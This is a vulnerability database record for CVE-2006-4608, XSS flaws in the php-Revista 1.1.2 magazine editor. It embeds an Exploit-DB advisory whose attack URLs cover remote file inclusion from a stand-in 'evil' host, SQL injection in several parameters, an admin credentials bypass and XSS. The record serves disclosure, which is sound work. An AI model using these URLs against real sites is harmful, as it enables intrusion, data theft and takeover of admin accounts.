ID CVE-2006-4608 Type cve Reporter NVD Modified 2018-10-17T17:38:21
Description
Multiple cross-site scripting (XSS) vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cadena parameter in busqueda.php and the (2) email parameter in lista.php.
{"osvdb": [{"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Vulnerability Description\nphp-revista contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'cadena' variable upon submission to the 'busqueda.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nphp-revista contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'cadena' variable upon submission to the 'busqueda.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>\n## References:\nVendor URL: http://php-revista.sourceforge.org/\n[Secunia Advisory ID:21738](https://secuniaresearch.flexerasoftware.com/advisories/21738/)\n[Related OSVDB ID: 28443](https://vulners.com/osvdb/OSVDB:28443)\n[Related OSVDB ID: 28445](https://vulners.com/osvdb/OSVDB:28445)\n[Related OSVDB ID: 28448](https://vulners.com/osvdb/OSVDB:28448)\n[Related OSVDB ID: 28446](https://vulners.com/osvdb/OSVDB:28446)\n[Related OSVDB ID: 28449](https://vulners.com/osvdb/OSVDB:28449)\n[Related OSVDB ID: 28451](https://vulners.com/osvdb/OSVDB:28451)\n[Related OSVDB ID: 28452](https://vulners.com/osvdb/OSVDB:28452)\n[Related OSVDB ID: 28447](https://vulners.com/osvdb/OSVDB:28447)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0017.html\n[CVE-2006-4608](https://vulners.com/cve/CVE-2006-4608)\nBugtraq ID: 19818\n", "reporter": "SirDarckCat(sirdarckcat@gmail.com)", "published": "2006-09-01T05:34:21", "type": "osvdb", "title": "php-revista busqueda.php cadena Variable XSS", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "php-revista", "version": "1.1.2", "operator": "eq"}], "cvelist": ["CVE-2006-4608"], "modified": "2006-09-01T05:34:21", "href": "https://vulners.com/osvdb/OSVDB:28450", "id": "OSVDB:28450", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T05:29:57", "osvdbidlist": ["28445", "28446", "28447", "28450", "28449", "28452", "28448", "28451", "28443"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "PHP-Revista 1.1.2 (RFI/SQLi/CB/XSS) Multiple Remote Vulnerabilities. CVE-2006-4605,CVE-2006-4606,CVE-2006-4607,CVE-2006-4608. Webapps exploit for php platform", "reporter": "SirDarckCat", "published": "2009-04-14T00:00:00", "type": "exploitdb", "title": "php-revista 1.1.2 rfi/sqli/cb/XSS Multiple Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4607", "CVE-2006-4608", "CVE-2006-4606", "CVE-2006-4605"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-04-14T00:00:00", "id": "EDB-ID:8425", "href": "https://www.exploit-db.com/exploits/8425/", "sourceData": "Discovered by Sirdarckcat from elhacker.net\n\n------------------------------------------------------------------------\n------------\n\nRevista 1.1.2\n\nhttp://php-revista.sourceforge.org\n\n------------------------------------------------------------------------\n------------\n\nRevista is a simple spanish PHP magazine editor.\n\nIt was done by php.org.mx\n\nIt suffers of multiple vulnerabilities.\n\n------------------------------------------------------------------------\n------------\n\nRemote File Inclusion\n\nhttp://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script\n\n------------------------------------------------------------------------\n------------\n\nSQLi\n\nhttp://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]\n\nhttp://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]\n\n------------------------------------------------------------------------\n------------\n\nCredentials Bypass\n\nhttp://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1\n\n------------------------------------------------------------------------\n------------\n\nXSS\n\nhttp://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>\n\nhttp://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>\n\n------------------------------------------------------------------------\n\n# milw0rm.com [2009-04-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8425/"}]}
